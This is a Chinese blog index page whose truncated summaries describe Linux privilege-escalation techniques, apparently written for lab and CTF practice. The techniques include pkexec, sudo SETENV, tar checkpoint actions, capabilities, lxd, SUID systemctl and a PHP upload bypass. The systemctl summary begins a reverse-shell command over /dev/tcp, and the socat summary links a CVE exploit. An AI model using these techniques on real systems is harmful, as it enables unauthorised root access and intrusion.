摘要:
*注:该方法仅限用户在sudo组中且知道用户密码的情况下进行,如果只是在sudoers中配置了用户,则无法提权。但如果在sudo组,有没有配置sudoers就无所谓了 1、检查pkexec的执行策略 cat /etc/polkit-1/localauthority.conf.d/* 如果看到有配置A 阅读全文
摘要:
sudo运行时默认会启用env_reset选项将从命令行设置的环境变量复原,因此通常情况下,当使用sudo命令时,通过本地修改环境变量也没法替换目标文件来进行提权,但如果sudo在配置时为用户设置了SETENV选项,情况就不一样了。SETENV会允许用户禁用env_reset选项,允许sudo使用当 阅读全文
摘要:
tar命令有两个参数 --checkpoint --checkpoint-action –checkpoint[=NUMBER] 显示每个Numbers记录的进度消息(默认值为10) –checkpoint-action=ACTION 在每个checkpoint(检查点)上执行ACTION 这里的‘ 阅读全文
摘要:
当python具备cap_sys_ptrace+ep 能力时,可以用来进行提权。提权原理见:https://blog.pentesteracademy.com/privilege-escalation-by-abusing-sys-ptrace-linux-capability-f6e6ad2a59 阅读全文
摘要:
*方法来自:https://xz.aliyun.com/t/9925 在php+windows的情况下:如果文件名+::$DATA会把::$DATA之后的数据当成文件流处理,不会检测后缀名,且保持::$DATA之前的文件名,然后这里便把文件的源代码给展示了出来: 阅读全文
摘要:
cd /tmp apt download socat tar zxvvf socat.tar.gz dpkg -x socat/socat*.deb . rm -rf socat cp usr/bin/socat . https://github.com/Plazmaz/CVE-2019-18634 阅读全文
摘要:
最近在做靶机的时候遇到如下代码审计题目: 在接收文件时会校验文件后缀。但是如果在上传文件时,同时post一个secure参数,就可以接受php文件的上传 <?php if(isset($_FILES['file']['name'])){ // file name $filename = $_FILE 阅读全文
摘要:
当当前用户具有lxd权限时(通过id命令可以查看),可以通过创建任意镜像,并将当前系统根目录挂载到镜像mnt目录下,然后通过chroot命令即可获取当前系统的root权限 一、使用lxc创建一个ubuntu容器并导入到lxd中(通常网上资料都alpine镜像,但其实可以使用任意容器):*如果本地没有 阅读全文
摘要:
Capabilities是linux的一种访问控制能力,能够更精细化的将操作系统权限(网络,文件等)赋权给应用程序,其中就包括设置uid和gid的权限。因此具备cap_setuid和cap_setgid权限的程序可以用来进行权限提升 一、查找设置过capabilities的应用程序 /usr/sbi 阅读全文
摘要:
当systemctl具备suid位或sudo权限时,可以用来进行提权。 一、首先编写一个service unit用来被systemctl加载 echo '[Service] Type=oneshot ExecStart=/bin/bash -c "/bin/bash -i > /dev/tcp/x. 阅读全文